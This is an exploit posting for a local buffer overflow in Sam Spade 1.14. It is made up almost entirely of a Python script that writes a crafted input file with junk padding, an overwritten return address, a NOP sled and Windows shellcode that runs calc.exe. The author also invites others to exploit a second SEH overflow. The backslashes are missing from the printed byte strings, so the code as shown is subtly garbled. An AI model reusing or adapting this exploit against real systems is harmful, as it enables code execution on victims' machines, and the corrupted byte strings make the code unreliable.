Sam Spade 1.14 Buffer Overflow
Posted on 03 November 2015
# Exploit Title : Sam Spade 1.14 - Buffer OverFlow # Date : 10/30/2015 # Exploit Author : MandawCoder # Contact : MandawCoder@gmail.com # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Version : 1.14 # Tested on : XP Professional SP3 En x86 # Category : Local Exploit # Description: # bug is on this section == Tools -> Crawl website... # Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section. # # this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it. f = open("file.txt", "w") Junk = "A"*503 addr = "x53x93x42x7E" space = "AAAA" nop="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" # Shellcode: # windows/exec - 277 bytes # CMD=calc.exe shellcode= ("xbax1cxb4xa5xacxdaxdaxd9x74x24xf4x5bx29xc9xb1" "x33x31x53x12x83xebxfcx03x4fxbax47x59x93x2ax0e" "xa2x6bxabx71x2ax8ex9axa3x48xdbx8fx73x1ax89x23" "xffx4ex39xb7x8dx46x4ex70x3bxb1x61x81x8dx7dx2d" "x41x8fx01x2fx96x6fx3bxe0xebx6ex7cx1cx03x22xd5" "x6bxb6xd3x52x29x0bxd5xb4x26x33xadxb1xf8xc0x07" "xbbx28x78x13xf3xd0xf2x7bx24xe1xd7x9fx18xa8x5c" "x6bxeax2bxb5xa5x13x1axf9x6ax2ax93xf4x73x6ax13" "xe7x01x80x60x9ax11x53x1bx40x97x46xbbx03x0fxa3" "x3axc7xd6x20x30xacx9dx6fx54x33x71x04x60xb8x74" "xcbxe1xfax52xcfxaax59xfax56x16x0fx03x88xfexf0" "xa1xc2xecxe5xd0x88x7axfbx51xb7xc3xfbx69xb8x63" "x94x58x33xecxe3x64x96x49x1bx2fxbbxfbxb4xf6x29" "xbexd8x08x84xfcxe4x8ax2dx7cx13x92x47x79x5fx14" "xbbxf3xf0xf1xbbxa0xf1xd3xdfx27x62xbfx31xc2x02" "x5ax4e") f.write(Junk + addr + space + nop + shellcode) f.close() print "Done"
